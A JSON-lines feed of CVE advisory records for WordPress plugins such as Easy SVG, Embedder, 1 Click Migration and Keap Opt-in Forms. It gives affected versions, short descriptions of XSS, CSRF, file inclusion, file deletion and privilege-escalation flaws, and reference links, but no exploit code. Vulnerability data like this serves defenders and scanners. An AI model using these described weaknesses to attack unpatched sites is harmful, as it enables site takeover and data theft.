{"CVE_ID":"CVE-2024-10269","slug":"easy-svg","versionImpact":"3.7","description":"The Easy SVG Support plugin for WordPress is vulnerable to Stored Cross-Site Scripting via REST API SVG File uploads in all versions up to, and including, 3.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5fbc0866-1e9d-457a-8ef3-fb046c89c1dd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5fbc0866-1e9d-457a-8ef3-fb046c89c1dd?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/easy-svg\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/easy-svg\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3181757\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3181757\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10869","slug":"guardgiant","versionImpact":"2.2.6","description":"The WordPress Brute Force Protection \u2013 Stop Brute Force Attacks plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg & remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.2.6. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/guardgiant\\\/tags\\\/2.2.6\\\/includes\\\/class-guardgiant-table-login-activity-log.php#L483\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/guardgiant\\\/tags\\\/2.2.6\\\/includes\\\/class-guardgiant-table-login-activity-log.php#L483\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/guardgiant\\\/tags\\\/2.2.6\\\/includes\\\/class-guardgiant-table-login-activity-log.php#L491\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/guardgiant\\\/tags\\\/2.2.6\\\/includes\\\/class-guardgiant-table-login-activity-log.php#L491\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0cca8b75-c4f5-47ef-90a1-c1270e2f37c1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0cca8b75-c4f5-47ef-90a1-c1270e2f37c1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13652","slug":"ecpay-ecommerce-for-woocommerce","versionImpact":"1.1.2411060","description":"The ECPay Ecommerce for WooCommerce plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'clear_ecpay_debug_log' AJAX action in all versions up to, and including, 1.1.2411060. This makes it possible for authenticated attackers, with Subscriber-level access and above, to clear the plugin's log files.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ecpay-ecommerce-for-woocommerce\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ecpay-ecommerce-for-woocommerce\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5ae08e0b-ea17-46c1-aad3-4ecea69c1bdc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5ae08e0b-ea17-46c1-aad3-4ecea69c1bdc?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13848","slug":"reaction-buttons","versionImpact":"2.1.6","description":"The Reaction Buttons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 2.1.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/reaction-buttons\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/reaction-buttons\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9f5a77d1-b575-4e7c-bf27-fc78260de302?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9f5a77d1-b575-4e7c-bf27-fc78260de302?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13638","slug":"order-attachments-for-woocommerce","versionImpact":"2.5.1","description":"The Order Attachments for WooCommerce plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.5.1 via the 'uploads' directory. This makes it possible for unauthenticated attackers to extract sensitive data stored insecurely in the \/wp-content\/uploads directory which can contain file attachments added to orders.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/order-attachments-for-woocommerce\\\/trunk\\\/src\\\/WCOA\\\/Attachments\\\/Attachment.php#L87\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/order-attachments-for-woocommerce\\\/trunk\\\/src\\\/WCOA\\\/Attachments\\\/Attachment.php#L87\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/order-attachments-for-woocommerce\\\/trunk\\\/src\\\/WCOA\\\/Utils\\\/Ajax.php#L61\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/order-attachments-for-woocommerce\\\/trunk\\\/src\\\/WCOA\\\/Utils\\\/Ajax.php#L61\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7e98b1ef-70dd-408d-8644-08933bca1cdd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7e98b1ef-70dd-408d-8644-08933bca1cdd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3417","slug":"embedder","versionImpact":"1.3.5","description":"The Embedder plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the ajax_set_global_option() function in versions 1.3 to 1.3.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/embedder\\\/trunk\\\/emb-admin-ajax.php#L41\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/embedder\\\/trunk\\\/emb-admin-ajax.php#L41\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fa86bcb9-e558-4b60-9473-65cd6f9663fd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fa86bcb9-e558-4b60-9473-65cd6f9663fd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3455","slug":"1-click-migration","versionImpact":"2.2","description":"The 1 Click WordPress Migration Plugin \u2013 100% FREE for a limited time plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'start_restore' function in all versions up to, and including, 2.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/1-click-migration\\\/trunk\\\/inc\\\/backup\\\/class-ocm-backup.php#L403\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/1-click-migration\\\/trunk\\\/inc\\\/backup\\\/class-ocm-backup.php#L403\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e982ae88-cfd0-46b9-ad64-00e398d307d6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e982ae88-cfd0-46b9-ad64-00e398d307d6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-39372","slug":"wpeventplus","versionImpact":"2.6.0","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in elbisnero WordPress Events Calendar Registration & Tickets allows Reflected XSS.This issue affects WordPress Events Calendar Registration & Tickets: from n\/a through 2.6.0.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wpeventplus\\\/vulnerability\\\/wordpress-wordpress-events-calendar-registration-tickets-plugin-2-6-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wpeventplus\\\/vulnerability\\\/wordpress-wordpress-events-calendar-registration-tickets-plugin-2-6-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6546","slug":"drive-folder-embeder","versionImpact":"1.1.0","description":"The Drive Folder Embedder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018tablecssclass\u2019 parameter in all versions up to, and including, 1.1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/drive-folder-embeder\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/drive-folder-embeder\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/86b21472-6a76-4d7b-84ff-f8b79c052aba?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/86b21472-6a76-4d7b-84ff-f8b79c052aba?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7645","slug":"extensions-for-cf7","versionImpact":"3.2.8","description":"The Extensions For CF7 (Contact form 7 Database, Conditional Fields and Redirection) plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the 'delete-file' field in all versions up to, and including, 3.2.8. This makes it possible for unauthenticated attackers to delete arbitrary files on the server, when an administrator deletes the submission, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3330857%40extensions-for-cf7&new=3330857%40extensions-for-cf7&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3330857%40extensions-for-cf7&new=3330857%40extensions-for-cf7&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/extensions-for-cf7\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/extensions-for-cf7\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/894b43ed-143d-4c0b-afd1-05fcd6fa5018?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/894b43ed-143d-4c0b-afd1-05fcd6fa5018?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2280","slug":"wpdirectorykit","versionImpact":"1.2.2","description":"The WP Directory Kit plugin for WordPress is vulnerable to unauthorized modification of data and loss of data due to a missing capability check on the 'ajax_public' function in versions up to, and including, 1.2.2. This makes it possible for unauthenticated attackers to delete or change plugin settings, import demo data, delete Directory Kit related posts and terms, and install arbitrary plugins. A partial patch was introduced in version 1.2.0 and an additional partial patch was introduced in version 1.2.2, but the issue was not fully patched until 1.2.3.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/abb1a758-5c16-4841-b1c7-0705ab16b328?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/abb1a758-5c16-4841-b1c7-0705ab16b328?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2907164\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2907164\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpdirectorykit\\\/tags\\\/1.1.8\\\/public\\\/class-wpdirectorykit-public.php#L249\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpdirectorykit\\\/tags\\\/1.1.8\\\/public\\\/class-wpdirectorykit-public.php#L249\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4419","slug":"wp-backgrounds-lite","versionImpact":"2.3","description":"The WP-Backgrounds Lite plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.3. This is due to missing or incorrect nonce validation on the ino_save_data() function. This makes it possible for unauthenticated attackers to save meta data via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d7a05894-8f9d-442f-961c-2e80aa25c3db?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d7a05894-8f9d-442f-961c-2e80aa25c3db?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-backgrounds-lite\\\/trunk\\\/inoplugs_background_plugin.php#L179\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-backgrounds-lite\\\/trunk\\\/inoplugs_background_plugin.php#L179\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1650","slug":"categorify","versionImpact":"1.0.7.4","description":"The Categorify plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the categorifyAjaxRenameCategory function in all versions up to, and including, 1.0.7.4. This makes it possible for authenticated attackers, with subscriber-level access and above, to rename categories.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f9a3dc87-5309-41fe-bfc3-60b5878b6c57?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f9a3dc87-5309-41fe-bfc3-60b5878b6c57?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3034410\\\/categorify\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3034410\\\/categorify\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1414","slug":"exclusive-addons-for-elementor","versionImpact":"2.6.9","description":"The Exclusive Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Call To Action widget in all versions up to, and including, 2.6.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6a12acf0-932e-4dff-9da6-9fbace11dbe1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6a12acf0-932e-4dff-9da6-9fbace11dbe1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3042217\\\/exclusive-addons-for-elementor\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3042217\\\/exclusive-addons-for-elementor\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5162","slug":"prettyphoto","versionImpact":"1.2.3","description":"The WordPress prettyPhoto plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018url\u2019 parameter in all versions up to, and including, 1.2.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c581616d-c9e7-46f2-9c2f-5e082a13fd0b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c581616d-c9e7-46f2-9c2f-5e082a13fd0b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/prettyphoto\\\/trunk\\\/addon\\\/jltma-wpf-addon.php#L96\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/prettyphoto\\\/trunk\\\/addon\\\/jltma-wpf-addon.php#L96\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8799","slug":"custom-banners","versionImpact":"3.3","description":"The Custom Banners plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 3.3. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/49618d9f-e6d8-40d5-b19f-7ce987939172?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/49618d9f-e6d8-40d5-b19f-7ce987939172?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-banners\\\/trunk\\\/include\\\/tgmpa\\\/init.php#L96\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-banners\\\/trunk\\\/include\\\/tgmpa\\\/init.php#L96\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10868","slug":"enteraddons","versionImpact":"2.1.9","description":"The Enter Addons \u2013 Ultimate Template Builder for Elementor plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 2.1.9 via the Advanced Tabs widget due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private or draft posts created by Elementor that they should not have access to.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/enteraddons\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/enteraddons\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ff8e8889-ec02-4b8d-9509-2c6335fdd9a4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ff8e8889-ec02-4b8d-9509-2c6335fdd9a4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11689","slug":"hq-rental-software","versionImpact":"1.5.29","description":"The HQ Rental Software plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.5.29. This is due to missing or incorrect nonce validation on the displaySettingsPage() function. This makes it possible for unauthenticated attackers to update arbitrary options that can be leveraged for privilege escalation via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hq-rental-software\\\/tags\\\/1.5.29\\\/includes\\\/settings\\\/HQRentalsAdminSettings.php#L74\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hq-rental-software\\\/tags\\\/1.5.29\\\/includes\\\/settings\\\/HQRentalsAdminSettings.php#L74\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hq-rental-software\\\/tags\\\/1.5.29\\\/includes\\\/settings\\\/HQRentalsSettings.php#L489\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hq-rental-software\\\/tags\\\/1.5.29\\\/includes\\\/settings\\\/HQRentalsSettings.php#L489\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2e9142b2-2935-4644-8c56-00789948202b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2e9142b2-2935-4644-8c56-00789948202b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13646","slug":"single-user-chat","versionImpact":"0.5","description":"The Single-user-chat plugin for WordPress is vulnerable to unauthorized modification of data that can lead to a denial of service due to insufficient validation on the 'single_user_chat_update_login' function in all versions up to, and including, 0.5. This makes it possible for authenticated attackers, with subscriber-level access and above, to update option values to 'login' on the WordPress site. This may be leveraged to update an option that would create an error on the site and deny service to legitimate users or be used to set some values to true such as registration.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/single-user-chat\\\/trunk\\\/single-user-chat.php#L326\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/single-user-chat\\\/trunk\\\/single-user-chat.php#L326\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8a4978c1-087f-4784-9691-91ca5044f60a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8a4978c1-087f-4784-9691-91ca5044f60a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13725","slug":"infusionsoft-official-opt-in-forms","versionImpact":"2.0.1","description":"The Keap Official Opt-in Forms plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 2.0.1 via the service parameter. This makes it possible for unauthenticated attackers to include PHP files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where PHP files can be uploaded and included. If register_argc_argv is enabled on the server and pearcmd.php is installed, this issue might lead to Remote Code Execution.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/infusionsoft-official-opt-in-forms\\\/trunk\\\/infusionsoft.php#L2540\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/infusionsoft-official-opt-in-forms\\\/trunk\\\/infusionsoft.php#L2540\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/infusionsoft-official-opt-in-forms\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/infusionsoft-official-opt-in-forms\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/692a5838-4a32-4444-b1a0-018fa25594a9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/692a5838-4a32-4444-b1a0-018fa25594a9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13469","slug":"pricingtable","versionImpact":"1.12.10","description":"The Pricing Table by PickPlugins plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Button Link in all versions up to, and including, 1.12.10 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/pricingtable\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/pricingtable\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5239c414-cd1d-4257-9f8e-e7a92c2119f9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5239c414-cd1d-4257-9f8e-e7a92c2119f9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
